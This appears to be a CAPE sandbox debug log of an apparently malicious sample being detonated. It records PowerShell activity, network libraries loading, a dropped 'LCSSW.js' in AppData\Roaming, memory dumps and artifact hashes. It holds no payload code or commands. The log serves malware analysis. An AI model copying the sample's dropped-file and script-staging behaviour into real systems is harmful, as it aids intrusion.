2025-12-08 08:32:11,578 [root] DEBUG: 1876: DLL loaded at 0x59320000: C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2e14a1befe55e7d9ad2457ceb5267e36\System.Xml.ni (0x774000 bytes).
2025-12-08 08:32:11,609 [root] DEBUG: 1876: DLL loaded at 0x59100000: C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Management\fea996c385fbc624826f8e043f6d5329\System.Management.ni (0x130000 bytes).
2025-12-08 08:32:11,609 [root] DEBUG: 556: OpenProcessHandler: Injection info created for process 3652, handle 0x3e8: C:\Windows\System32\audiodg.exe
2025-12-08 08:32:11,625 [root] DEBUG: 1876: DLL loaded at 0x58E10000: C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Dired13b18a9#\22226fd213cda8b0409db35f1a6000f7\System.DirectoryServices.ni (0x12c000 bytes).
2025-12-08 08:32:11,625 [root] DEBUG: 1876: DLL loaded at 0x58E00000: C:\Windows\system32\api-ms-win-core-xstate-l2-1-0 (0x3000 bytes).
2025-12-08 08:32:11,640 [root] DEBUG: 1876: hook_api: clrjit::compileMethod export address 0x58D73700 obtained via GetFunctionAddress
2025-12-08 08:32:11,640 [root] DEBUG: 1876: DLL loaded at 0x58D70000: C:\Windows\Microsoft.NET\Framework\v4.0.30319\clrjit (0x89000 bytes).
2025-12-08 08:32:11,656 [root] DEBUG: 556: OpenProcessHandler: Injection info created for process 396, handle 0x610: C:\Windows\System32\taskhost.exe
2025-12-08 08:32:11,656 [root] DEBUG: 1876: .NET JIT native cache at 0x00A10000: scans and dumps active.
2025-12-08 08:32:11,656 [root] DEBUG: 1876: AllocationHandler: Allocation already in tracked region list: 0x00310000.
2025-12-08 08:32:11,675 [root] DEBUG: 1876: DLL loaded at 0x58CF0000: C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P6f792626#\0d866ff1d48a2b0077be47701476978d\Microsoft.PowerShell.Security.ni (0x54000 bytes).
2025-12-08 08:32:11,691 [root] DEBUG: 1876: AllocationHandler: Allocation already in tracked region list: 0x00310000.
2025-12-08 08:32:11,738 [root] DEBUG: 1876: DLL loaded at 0x58BE0000: C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8c730c7fbe608461407cf3be279cdeab\System.Configuration.ni (0x105000 bytes).
2025-12-08 08:32:11,743 [root] DEBUG: 1876: AllocationHandler: Allocation already in tracked region list: 0x00310000.
2025-12-08 08:32:11,747 [root] DEBUG: 1876: DLL loaded at 0x58B60000: C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Mf49f6405#\d888c64a78e1d160344eadccac1e18e2\Microsoft.Management.Infrastructure.ni (0x80000 bytes).
2025-12-08 08:32:11,754 [root] DEBUG: 1876: DLL loaded at 0x58AA0000: C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Transactions\ce1b28106ce7b869fa471d6407556191\System.Transactions.ni (0xb8000 bytes).
2025-12-08 08:32:11,754 [root] DEBUG: 1876: DLL loaded at 0x58A50000: C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Numerics\39bc6b2550e216781f343bac4cc024af\System.Numerics.ni (0x47000 bytes).
2025-12-08 08:32:11,770 [root] DEBUG: 1876: DLL loaded at 0x58A00000: C:\Windows\Microsoft.Net\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions (0x4c000 bytes).
2025-12-08 08:32:11,778 [root] DEBUG: 1876: DLL loaded at 0x75350000: C:\Windows\system32\secur32 (0x8000 bytes).
2025-12-08 08:32:11,778 [root] DEBUG: 1876: api-rate-cap: NtOpenKey hook disabled due to rate
2025-12-08 08:32:11,786 [root] DEBUG: 1876: api-rate-cap: NtQueryValueKey hook disabled due to rate
2025-12-08 08:32:11,786 [root] DEBUG: 1876: api-rate-cap: NtClose hook disabled due to rate
2025-12-08 08:32:11,793 [root] DEBUG: 1876: AllocationHandler: Allocation already in tracked region list: 0x009B0000.
2025-12-08 08:32:11,793 [root] DEBUG: 1876: AllocationHandler: Allocation already in tracked region list: 0x00310000.
2025-12-08 08:32:11,809 [root] DEBUG: 1876: DLL loaded at 0x58860000: C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.CSharp\dcb96320d4312deea3218436f1f8b65c\Microsoft.CSharp.ni (0x198000 bytes).
2025-12-08 08:32:11,817 [root] DEBUG: 1876: AllocationHandler: Allocation already in tracked region list: 0x00310000.
2025-12-08 08:32:11,825 [root] DEBUG: 1876: AllocationHandler: Adding allocation to tracked region list: 0x02AA0000, size: 0x1000.
2025-12-08 08:32:11,825 [root] DEBUG: 1876: AddTrackedRegion: GetEntropy failed.
2025-12-08 08:32:11,825 [root] DEBUG: 1876: AllocationHandler: Processing previous tracked region at: 0x009F0000.
2025-12-08 08:32:11,833 [root] DEBUG: 1876: DumpPEsInRange: Scanning range 0x009F0000 - 0x009F00C0.
2025-12-08 08:32:11,833 [root] DEBUG: 1876: ScanForDisguisedPE: Size too small: 0xc0 bytes
2025-12-08 08:32:11,840 [lib.common.results] INFO: Uploading file C:\WcVPSdVSz\CAPE\1876_93312661132081122025 to CAPE\c705ac5c3e47ef79071857c89cae65e8bed7934de0a853b053cc8c4568cd4a68; Size is 192; Max size: 100000000
2025-12-08 08:32:11,840 [root] DEBUG: 1876: DumpMemory: Payload successfully created: C:\WcVPSdVSz\CAPE\1876_93312661132081122025 (size 192 bytes)
2025-12-08 08:32:11,840 [root] DEBUG: 1876: DumpRegion: Dumped entire allocation from 0x009F0000, size 4096 bytes.
2025-12-08 08:32:11,848 [root] DEBUG: 1876: ProcessTrackedRegion: Dumped region at 0x009F0000.
2025-12-08 08:32:11,848 [root] DEBUG: 1876: YaraScan: Scanning 0x009F0000, size 0xc0
2025-12-08 08:32:11,864 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\2k4ha12y.rev.ps1 to files\6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b; Size is 1; Max size: 100000000
2025-12-08 08:32:11,879 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\0ro50elk.i5p.psm1 to files\6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b; Size is 1; Max size: 100000000
2025-12-08 08:32:11,887 [root] DEBUG: 1876: DLL loaded at 0x74170000: C:\Windows\system32\uxtheme (0x40000 bytes).
2025-12-08 08:32:11,887 [root] DEBUG: 1876: api-rate-cap: SwitchToThread hook disabled due to rate
2025-12-08 08:32:11,895 [root] DEBUG: 1876: DLL loaded at 0x75450000: C:\Windows\system32\RpcRtRemote (0xe000 bytes).
2025-12-08 08:32:11,895 [root] DEBUG: 1876: AllocationHandler: Allocation already in tracked region list: 0x002E0000.
2025-12-08 08:32:11,895 [root] DEBUG: 1876: AllocationHandler: Allocation already in tracked region list: 0x02AA0000.
2025-12-08 08:32:11,903 [root] DEBUG: 1876: AllocationHandler: Allocation already in tracked region list: 0x04FF0000.
2025-12-08 08:32:11,903 [root] DEBUG: 1876: AllocationHandler: Allocation already in tracked region list: 0x04FF0000.
2025-12-08 08:32:11,903 [root] DEBUG: 1876: caller_dispatch: Added region at 0x00A10000 to tracked regions list (ntdll::NtAllocateVirtualMemory returns to 0x00A1057D, thread 3944).
2025-12-08 08:32:11,903 [root] DEBUG: 1876: ProcessTrackedRegion: .NET cache region at 0x00A10000 skipped
2025-12-08 08:32:11,911 [root] DEBUG: 1876: AllocationHandler: Allocation already in tracked region list: 0x02AA0000.
2025-12-08 08:32:11,911 [root] DEBUG: 1876: AllocationHandler: Allocation already in tracked region list: 0x00310000.
2025-12-08 08:32:11,911 [root] DEBUG: 1876: .NET JIT native cache at 0x009B0000: scans and dumps active.
2025-12-08 08:32:11,918 [root] DEBUG: 1876: AllocationHandler: Allocation already in tracked region list: 0x02AA0000.
2025-12-08 08:32:11,926 [root] DEBUG: 1876: api-rate-cap: ReadProcessMemory hook disabled due to rate
2025-12-08 08:32:11,926 [root] DEBUG: 1876: api-rate-cap: NtReadVirtualMemory hook disabled due to rate
2025-12-08 08:32:11,926 [root] DEBUG: 1876: AllocationHandler: Allocation already in tracked region list: 0x00310000.
2025-12-08 08:32:11,926 [root] DEBUG: 1876: AllocationHandler: Allocation already in tracked region list: 0x02AA0000.
2025-12-08 08:32:11,958 [root] DEBUG: 1876: AllocationHandler: Adding allocation to tracked region list: 0x02B20000, size: 0x1000.
2025-12-08 08:32:11,958 [root] DEBUG: 1876: AddTrackedRegion: GetEntropy failed.
2025-12-08 08:32:12,078 [root] DEBUG: 1876: DLL loaded at 0x57CF0000: C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P521220ea#\93a2e392ba379db038d1a507c1491ba3\Microsoft.PowerShell.Commands.Utility.ni (0xb6e000 bytes).
2025-12-08 08:32:12,083 [root] DEBUG: 1876: DLL loaded at 0x57CC0000: C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Confe64a9051#\4f83b31ca1970081748ea8cc5e733200\System.Configuration.Install.ni (0x28000 bytes).
2025-12-08 08:32:12,115 [root] DEBUG: 1876: AllocationHandler: Allocation already in tracked region list: 0x02AA0000.
2025-12-08 08:32:12,124 [root] DEBUG: 1876: AllocationHandler: Allocation already in tracked region list: 0x02AA0000.
2025-12-08 08:32:12,129 [root] DEBUG: 1876: AllocationHandler: Adding allocation to tracked region list: 0x7FF50000, size: 0x50000.
2025-12-08 08:32:12,130 [root] DEBUG: 1876: GetEntropy: Error - Supplied address inaccessible: 0x7FF50000
2025-12-08 08:32:12,130 [root] DEBUG: 1876: AddTrackedRegion: GetEntropy failed.
2025-12-08 08:32:12,130 [root] DEBUG: 1876: AllocationHandler: Processing previous tracked region at: 0x02B20000.
2025-12-08 08:32:12,133 [root] DEBUG: 1876: DumpPEsInRange: Scanning range 0x02B20000 - 0x02B20E97.
2025-12-08 08:32:12,134 [root] DEBUG: 1876: ScanForDisguisedPE: No PE image located in range 0x02B20000-0x02B20E97.
2025-12-08 08:32:12,134 [lib.common.results] INFO: Uploading file C:\WcVPSdVSz\CAPE\1876_15460921232081122025 to CAPE\97ccd2b12302b4cd42b4058dc7022c8b26fec49ca4f23a6f79218d061839e8de; Size is 3735; Max size: 100000000
2025-12-08 08:32:12,150 [root] DEBUG: 1876: DumpMemory: Payload successfully created: C:\WcVPSdVSz\CAPE\1876_15460921232081122025 (size 3735 bytes)
2025-12-08 08:32:12,150 [root] DEBUG: 1876: DumpRegion: Dumped entire allocation from 0x02B20000, size 4096 bytes.
2025-12-08 08:32:12,150 [root] DEBUG: 1876: ProcessTrackedRegion: Dumped region at 0x02B20000.
2025-12-08 08:32:12,150 [root] DEBUG: 1876: YaraScan: Scanning 0x02B20000, size 0xe97
2025-12-08 08:32:12,150 [root] DEBUG: 1876: AllocationHandler: Memory region (size 0x50000) reserved but not committed at 0x7FF50000.
2025-12-08 08:32:12,150 [root] DEBUG: 1876: AllocationHandler: Previously reserved region at 0x7FF50000, committing at: 0x7FF50000.
2025-12-08 08:32:12,150 [root] DEBUG: 1876: AllocationHandler: Allocation already in tracked region list: 0x7FF50000.
2025-12-08 08:32:12,150 [root] DEBUG: 1876: AllocationHandler: Allocation already in tracked region list: 0x7FF50000.
2025-12-08 08:32:12,150 [root] DEBUG: 1876: AllocationHandler: Adding allocation to tracked region list: 0x7FF40000, size: 0x10000.
2025-12-08 08:32:12,150 [root] DEBUG: 1876: GetEntropy: Error - Supplied address inaccessible: 0x7FF40000
2025-12-08 08:32:12,150 [root] DEBUG: 1876: AddTrackedRegion: GetEntropy failed.
2025-12-08 08:32:12,150 [root] DEBUG: 1876: AllocationHandler: Processing previous tracked region at: 0x7FF50000.
2025-12-08 08:32:12,150 [root] DEBUG: 1876: DumpPEsInRange: Scanning range 0x7FF50000 - 0x7FF5003C.
2025-12-08 08:32:12,150 [root] DEBUG: 1876: ScanForDisguisedPE: Size too small: 0x3c bytes
2025-12-08 08:32:12,158 [lib.common.results] INFO: Uploading file C:\WcVPSdVSz\CAPE\1876_29868001232081122025 to CAPE\61b1d703dcd0fa3e1fe32c00a7cb39a37a0e196cdc54350b3b56ffc1e6a304ba; Size is 60; Max size: 100000000
2025-12-08 08:32:12,158 [root] DEBUG: 1876: DumpMemory: Payload successfully created: C:\WcVPSdVSz\CAPE\1876_29868001232081122025 (size 60 bytes)
2025-12-08 08:32:12,158 [root] DEBUG: 1876: DumpRegion: Dumped entire allocation from 0x7FF50000, size 4096 bytes.
2025-12-08 08:32:12,158 [root] DEBUG: 1876: ProcessTrackedRegion: Dumped region at 0x7FF50000.
2025-12-08 08:32:12,158 [root] DEBUG: 1876: YaraScan: Scanning 0x7FF50000, size 0x3c
2025-12-08 08:32:12,158 [root] DEBUG: 1876: AllocationHandler: Memory region (size 0x10000) reserved but not committed at 0x7FF40000.
2025-12-08 08:32:12,158 [root] DEBUG: 1876: AllocationHandler: Previously reserved region at 0x7FF40000, committing at: 0x7FF40000.
2025-12-08 08:32:12,166 [root] DEBUG: 1876: AllocationHandler: Allocation already in tracked region list: 0x02B20000.
2025-12-08 08:32:12,166 [root] DEBUG: 1876: DLL loaded at 0x70530000: C:\Windows\system32\rasapi32 (0x52000 bytes).
2025-12-08 08:32:12,166 [root] DEBUG: 1876: DLL loaded at 0x70510000: C:\Windows\system32\rasman (0x15000 bytes).
2025-12-08 08:32:12,173 [root] DEBUG: 1876: DLL loaded at 0x73900000: C:\Windows\system32\rtutils (0xd000 bytes).
2025-12-08 08:32:12,181 [root] DEBUG: 1876: DLL loaded at 0x74E90000: C:\Windows\system32\mswsock (0x3c000 bytes).
2025-12-08 08:32:12,189 [root] DEBUG: 1876: DLL loaded at 0x749F0000: C:\Windows\System32\wshtcpip (0x5000 bytes).
2025-12-08 08:32:12,189 [root] DEBUG: 1876: DLL loaded at 0x74E80000: C:\Windows\System32\wship6 (0x6000 bytes).
2025-12-08 08:32:12,197 [root] DEBUG: 1876: DLL loaded at 0x72BF0000: C:\Windows\system32\winhttp (0x58000 bytes).
2025-12-08 08:32:12,197 [root] DEBUG: 1876: DLL loaded at 0x72BA0000: C:\Windows\system32\webio (0x50000 bytes).
2025-12-08 08:32:12,197 [root] DEBUG: 1876: DLL loaded at 0x74B90000: C:\Windows\system32\credssp (0x8000 bytes).
2025-12-08 08:32:12,197 [root] DEBUG: 1876: DLL loaded at 0x73640000: C:\Windows\system32\IPHLPAPI (0x1c000 bytes).
2025-12-08 08:32:12,197 [root] DEBUG: 1876: DLL loaded at 0x736D0000: C:\Windows\system32\WINNSI (0x7000 bytes).
2025-12-08 08:32:12,205 [root] DEBUG: 1876: DLL loaded at 0x735C0000: C:\Windows\system32\dhcpcsvc6 (0xd000 bytes).
2025-12-08 08:32:12,205 [root] DEBUG: 1876: DLL loaded at 0x73540000: C:\Windows\system32\dhcpcsvc (0x12000 bytes).
2025-12-08 08:32:12,205 [root] DEBUG: 1876: DLL loaded at 0x755D0000: C:\Windows\system32\CFGMGR32 (0x27000 bytes).
2025-12-08 08:32:12,205 [root] DEBUG: 1876: AllocationHandler: Allocation already in tracked region list: 0x02AA0000.
2025-12-08 08:32:12,212 [root] DEBUG: 1876: DLL loaded at 0x74D50000: C:\Windows\system32\DNSAPI (0x44000 bytes).
2025-12-08 08:32:12,212 [root] DEBUG: 1876: DLL loaded at 0x72C90000: C:\Windows\system32\NLAapi (0x10000 bytes).
2025-12-08 08:32:12,212 [root] DEBUG: 1876: DLL loaded at 0x72620000: C:\Windows\system32\napinsp (0x10000 bytes).
2025-12-08 08:32:12,220 [root] DEBUG: 1876: DLL loaded at 0x70F50000: C:\Windows\system32\pnrpnsp (0x12000 bytes).
2025-12-08 08:32:12,228 [root] DEBUG: 1876: DLL loaded at 0x72610000: C:\Windows\System32\winrnr (0x8000 bytes).
2025-12-08 08:32:12,228 [root] DEBUG: 1876: DLL loaded at 0x72500000: C:\Windows\system32\rasadhlp (0x6000 bytes).
2025-12-08 08:32:12,236 [root] DEBUG: 1876: DLL loaded at 0x73600000: C:\Windows\System32\fwpuclnt (0x38000 bytes).
2025-12-08 08:32:17,283 [root] DEBUG: 556: CreateProcessHandler: Injection info set for new process 1920: C:\Windows\system32\DllHost.exe, ImageBase: 0x00260000
2025-12-08 08:32:17,283 [root] INFO: Announced 32-bit process name: dllhost.exe pid: 1920
2025-12-08 08:32:17,283 [lib.api.process] INFO: Monitor config for <Process 1920 dllhost.exe>: C:\tmp76j_8pz8\dll\1920.ini
2025-12-08 08:32:17,298 [lib.api.process] INFO: 32-bit DLL to inject is C:\tmp76j_8pz8\dll\AVhNcK.dll, loader C:\tmp76j_8pz8\bin\Hlvfqvk.exe
2025-12-08 08:32:17,298 [root] DEBUG: 1876: api-rate-cap: RegQueryValueExW hook disabled due to rate
2025-12-08 08:32:17,314 [root] DEBUG: Loader: Injecting process 1920 (thread 1648) with C:\tmp76j_8pz8\dll\AVhNcK.dll.
2025-12-08 08:32:17,314 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2025-12-08 08:32:17,314 [root] DEBUG: Successfully injected DLL C:\tmp76j_8pz8\dll\AVhNcK.dll.
2025-12-08 08:32:17,314 [lib.api.process] INFO: Injected into 32-bit <Process 1920 dllhost.exe>
2025-12-08 08:32:17,330 [root] INFO: Announced 32-bit process name: dllhost.exe pid: 1920
2025-12-08 08:32:17,330 [lib.api.process] INFO: Monitor config for <Process 1920 dllhost.exe>: C:\tmp76j_8pz8\dll\1920.ini
2025-12-08 08:32:17,330 [lib.api.process] INFO: 32-bit DLL to inject is C:\tmp76j_8pz8\dll\AVhNcK.dll, loader C:\tmp76j_8pz8\bin\Hlvfqvk.exe
2025-12-08 08:32:17,345 [root] DEBUG: Loader: Injecting process 1920 (thread 1648) with C:\tmp76j_8pz8\dll\AVhNcK.dll.
2025-12-08 08:32:17,345 [root] DEBUG: InjectDllViaIAT: This image has already been patched.
2025-12-08 08:32:17,345 [root] DEBUG: Successfully injected DLL C:\tmp76j_8pz8\dll\AVhNcK.dll.
2025-12-08 08:32:17,345 [lib.api.process] INFO: Injected into 32-bit <Process 1920 dllhost.exe>
2025-12-08 08:32:17,345 [root] DEBUG: 1920: Python path set to 'C:\Python38'.
2025-12-08 08:32:17,345 [root] DEBUG: 1920: Dropped file limit defaulting to 100.
2025-12-08 08:32:17,376 [root] INFO: Disabling sleep skipping.
2025-12-08 08:32:17,376 [root] DEBUG: 1920: YaraInit: Compiled rules loaded from existing file C:\tmp76j_8pz8\data\yara\capemon.yac
2025-12-08 08:32:17,376 [root] DEBUG: 1920: YaraScan: Scanning 0x00260000, size 0x4114
2025-12-08 08:32:17,376 [root] DEBUG: 1920: Monitor initialised: 32-bit capemon loaded in process 1920 at 0x6c9a0000, thread 1648, image base 0x260000, stack from 0x1b6000-0x1c0000
2025-12-08 08:32:17,376 [root] DEBUG: 1920: Commandline: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
2025-12-08 08:32:17,376 [root] DEBUG: 1920: GetAddressByYara: ModuleBase 0x774E0000 FunctionName LdrpCallInitRoutine
2025-12-08 08:32:17,376 [root] DEBUG: 1920: hook_api: LdrpCallInitRoutine export address 0x77538810 obtained via GetFunctionAddress
2025-12-08 08:32:17,376 [root] DEBUG: 1920: hook_api: Warning - CreateRemoteThreadEx export address 0x764AF98F differs from GetProcAddress -> 0x754EBB18 (KERNELBASE.dll::0xbb18)
2025-12-08 08:32:17,376 [root] DEBUG: 1920: hook_api: Warning - UpdateProcThreadAttribute export address 0x764B020F differs from GetProcAddress -> 0x754F43FB (KERNELBASE.dll::0x143fb)
2025-12-08 08:32:17,392 [root] WARNING: b'Unable to place hook on GetCommandLineA'
2025-12-08 08:32:17,392 [root] DEBUG: 1920: set_hooks: Unable to hook GetCommandLineA
2025-12-08 08:32:17,392 [root] WARNING: b'Unable to place hook on GetCommandLineW'
2025-12-08 08:32:17,392 [root] DEBUG: 1920: set_hooks: Unable to hook GetCommandLineW
2025-12-08 08:32:17,392 [root] DEBUG: 1920: Hooked 611 out of 613 functions
2025-12-08 08:32:17,392 [root] DEBUG: 1920: WoW64 not detected.
2025-12-08 08:32:17,408 [root] INFO: Loaded monitor into process with pid 1920
2025-12-08 08:32:17,408 [root] DEBUG: 1920: caller_dispatch: Added region at 0x00260000 to tracked regions list (kernel32::GetSystemTimeAsFileTime returns to 0x0026193E, thread 1648).
2025-12-08 08:32:17,408 [root] DEBUG: 1920: YaraScan: Scanning 0x00260000, size 0x4114
2025-12-08 08:32:17,408 [root] DEBUG: 1920: ProcessImageBase: Main module image at 0x00260000 unmodified (entropy change 0.000000e+00)
2025-12-08 08:32:17,408 [root] DEBUG: 1920: DLL loaded at 0x753E0000: C:\Windows\system32\CRYPTBASE (0xc000 bytes).
2025-12-08 08:32:17,408 [root] DEBUG: 1920: DLL loaded at 0x76100000: C:\Windows\system32\CLBCatQ (0x83000 bytes).
2025-12-08 08:32:17,408 [root] DEBUG: 1920: DLL loaded at 0x75D80000: C:\Windows\system32\OLEAUT32 (0x8f000 bytes).
2025-12-08 08:32:17,408 [root] DEBUG: 1920: DLL loaded at 0x74ED0000: C:\Windows\system32\CRYPTSP (0x16000 bytes).
2025-12-08 08:32:17,408 [root] DEBUG: 1920: DLL loaded at 0x74C60000: C:\Windows\system32\rsaenh (0x3b000 bytes).
2025-12-08 08:32:17,408 [root] DEBUG: 1920: DLL loaded at 0x75450000: C:\Windows\system32\RpcRtRemote (0xe000 bytes).
2025-12-08 08:32:17,408 [root] DEBUG: 1920: DLL loaded at 0x74170000: C:\Windows\system32\uxtheme (0x40000 bytes).
2025-12-08 08:32:17,423 [root] DEBUG: 1920: DLL loaded at 0x75920000: C:\Windows\System32\wininet (0x1e4000 bytes).
2025-12-08 08:32:17,423 [root] DEBUG: 1920: DLL loaded at 0x75610000: C:\Windows\system32\api-ms-win-downlevel-user32-l1-1-0 (0x4000 bytes).
2025-12-08 08:32:17,423 [root] DEBUG: 1920: DLL loaded at 0x757E0000: C:\Windows\system32\api-ms-win-downlevel-shlwapi-l1-1-0 (0x4000 bytes).
2025-12-08 08:32:17,423 [root] DEBUG: 1920: DLL loaded at 0x75620000: C:\Windows\system32\api-ms-win-downlevel-version-l1-1-0 (0x4000 bytes).
2025-12-08 08:32:17,423 [root] DEBUG: 1920: DLL loaded at 0x74960000: C:\Windows\system32\version (0x9000 bytes).
2025-12-08 08:32:17,423 [root] DEBUG: 1920: DLL loaded at 0x75600000: C:\Windows\system32\api-ms-win-downlevel-normaliz-l1-1-0 (0x3000 bytes).
2025-12-08 08:32:17,423 [root] DEBUG: 1920: DLL loaded at 0x77630000: C:\Windows\system32\normaliz (0x3000 bytes).
2025-12-08 08:32:17,439 [root] DEBUG: 1920: DLL loaded at 0x761B0000: C:\Windows\system32\iertutil (0x232000 bytes).
2025-12-08 08:32:17,439 [root] DEBUG: 1920: DLL loaded at 0x755C0000: C:\Windows\system32\api-ms-win-downlevel-advapi32-l1-1-0 (0x5000 bytes).
2025-12-08 08:32:17,439 [root] DEBUG: 1920: DLL loaded at 0x757C0000: C:\Windows\system32\USERENV (0x17000 bytes).
2025-12-08 08:32:17,439 [root] DEBUG: 1920: DLL loaded at 0x754D0000: C:\Windows\system32\profapi (0xb000 bytes).
2025-12-08 08:32:17,439 [root] DEBUG: 1920: DLL loaded at 0x75790000: C:\Windows\system32\api-ms-win-downlevel-ole32-l1-1-0 (0x4000 bytes).
2025-12-08 08:32:17,439 [root] DEBUG: 1920: DLL loaded at 0x75350000: C:\Windows\system32\Secur32 (0x8000 bytes).
2025-12-08 08:32:17,439 [root] DEBUG: 1920: DLL loaded at 0x766D0000: C:\Windows\system32\SHELL32 (0xc4c000 bytes).
2025-12-08 08:32:17,439 [root] DEBUG: 1920: DLL loaded at 0x72CD0000: C:\Windows\system32\api-ms-win-downlevel-advapi32-l2-1-0 (0x4000 bytes).
2025-12-08 08:32:17,439 [root] DEBUG: 1920: DLL loaded at 0x72BF0000: C:\Windows\system32\winhttp (0x58000 bytes).
2025-12-08 08:32:17,455 [root] DEBUG: 1920: DLL loaded at 0x72BA0000: C:\Windows\system32\webio (0x50000 bytes).
2025-12-08 08:32:17,455 [root] DEBUG: 1920: DLL loaded at 0x74E90000: C:\Windows\system32\mswsock (0x3c000 bytes).
2025-12-08 08:32:17,455 [root] DEBUG: 1920: DLL loaded at 0x74E80000: C:\Windows\System32\wship6 (0x6000 bytes).
2025-12-08 08:32:17,455 [root] DEBUG: 1920: DLL loaded at 0x73640000: C:\Windows\system32\IPHLPAPI (0x1c000 bytes).
2025-12-08 08:32:17,455 [root] DEBUG: 1920: DLL loaded at 0x736D0000: C:\Windows\system32\WINNSI (0x7000 bytes).
2025-12-08 08:32:22,455 [root] INFO: Added new file to list with pid None and path C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat
2025-12-08 08:32:22,455 [root] INFO: Process with pid 1920 has terminated
2025-12-08 08:32:22,455 [root] DEBUG: 1920: NtTerminateProcess hook: Attempting to dump process 1920
2025-12-08 08:32:22,455 [root] DEBUG: 1920: DoProcessDump: Skipping process dump as code is identical on disk.
2025-12-08 08:32:26,267 [root] DEBUG: 556: OpenProcessHandler: Injection info created for process 2588, handle 0x3e8: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe
2025-12-08 08:32:38,345 [root] DEBUG: 1876: AllocationHandler: Allocation already in tracked region list: 0x009B0000.
2025-12-08 08:32:38,361 [root] DEBUG: 1876: DLL loaded at 0x57B10000: C:\Windows\Microsoft.NET\Framework\v4.0.30319\diasymreader (0x105000 bytes).
2025-12-08 08:32:38,423 [root] DEBUG: 1876: DLL loaded at 0x57930000: C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pae3498d9#\73395fe20a6546d133e57eefc2347a2d\Microsoft.PowerShell.Commands.Management.ni (0x1d7000 bytes).
2025-12-08 08:32:38,439 [root] DEBUG: 1876: DLL loaded at 0x742B0000: C:\Windows\system32\PROPSYS (0xf5000 bytes).
2025-12-08 08:32:38,439 [root] DEBUG: 1876: DLL loaded at 0x743F0000: C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32 (0x19e000 bytes).
2025-12-08 08:32:38,455 [root] DEBUG: 1876: DLL loaded at 0x76100000: C:\Windows\system32\CLBCatQ (0x83000 bytes).
2025-12-08 08:32:38,455 [root] DEBUG: 1876: DLL loaded at 0x73A90000: C:\Windows\system32\ntmarta (0x21000 bytes).
2025-12-08 08:32:38,455 [root] DEBUG: 1876: DLL loaded at 0x75810000: C:\Windows\system32\WLDAP32 (0x45000 bytes).
2025-12-08 08:32:38,501 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Roaming\LCSSW.js to files\a954043909b90d12ab1659e2d28adb236b4ac521084282448757f7b1fd8d8b05; Size is 621; Max size: 100000000
2025-12-08 08:32:38,517 [root] DEBUG: 1876: DLL loaded at 0x75F60000: C:\Windows\system32\SETUPAPI (0x19d000 bytes).
2025-12-08 08:32:38,517 [root] DEBUG: 1876: DLL loaded at 0x757A0000: C:\Windows\system32\DEVOBJ (0x12000 bytes).
2025-12-08 08:32:38,689 [root] INFO: Added new file to list with pid None and path C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
2025-12-08 08:32:38,705 [root] INFO: Added new file to list with pid None and path C:\PSTranscripts\20251208\PowerShell_transcript.USERDUM-NNN0BL9.awDK_ja3.20251208163520.txt
2025-12-08 08:32:38,705 [root] DEBUG: 1876: NtTerminateProcess hook: Attempting to dump process 1876
2025-12-08 08:32:38,705 [root] DEBUG: 1876: DoProcessDump: Skipping process dump as code is identical on disk.
2025-12-08 08:32:38,705 [root] DEBUG: 1876: DumpInterestingRegions: Dumping .NET JIT native cache at 0x009B0000.
2025-12-08 08:32:38,720 [lib.common.results] INFO: Uploading file C:\WcVPSdVSz\CAPE\1876_7418342837881122025 to CAPE\af070806a1bdcdd41220cebd7dcedba55e3cc5351ba87ea94fb3e5cce7e64722; Size is 20822; Max size: 100000000
2025-12-08 08:32:38,736 [root] DEBUG: 1876: DumpMemory: Payload successfully created: C:\WcVPSdVSz\CAPE\1876_7418342837881122025 (size 20822 bytes)
2025-12-08 08:32:38,736 [root] DEBUG: 1876: DumpInterestingRegions: Dumping .NET JIT native cache at 0x00A10000.
2025-12-08 08:32:38,751 [lib.common.results] INFO: Uploading file C:\WcVPSdVSz\CAPE\1876_5949628837881122025 to CAPE\3ad9c3ab8fe262484ecec22d5ca2689de8007f38a8bc9da813e8bf367a75fe28; Size is 7346; Max size: 100000000
2025-12-08 08:32:38,751 [root] DEBUG: 1876: DumpMemory: Payload successfully created: C:\WcVPSdVSz\CAPE\1876_5949628837881122025 (size 7346 bytes)
2025-12-08 08:32:38,751 [root] DEBUG: 1876: DumpPEsInRange: Scanning range 0x7FF40000 - 0x7FF40088.
2025-12-08 08:32:38,783 [root] DEBUG: 1876: ScanForDisguisedPE: Size too small: 0x88 bytes
2025-12-08 08:32:38,783 [lib.common.results] INFO: Uploading file C:\WcVPSdVSz\CAPE\1876_2779225837881122025 to CAPE\f99bdb4a9ae118289845e80ba2e85868f8a5d6208e885863ab1ed5236926bc7e; Size is 136; Max size: 100000000
2025-12-08 08:32:38,814 [root] DEBUG: 1876: DumpMemory: Payload successfully created: C:\WcVPSdVSz\CAPE\1876_2779225837881122025 (size 136 bytes)
2025-12-08 08:32:38,814 [root] DEBUG: 1876: DumpRegion: Dumped entire allocation from 0x7FF40000, size 4096 bytes.
2025-12-08 08:32:38,814 [root] DEBUG: 1876: ProcessTrackedRegion: Dumped region at 0x7FF40000.
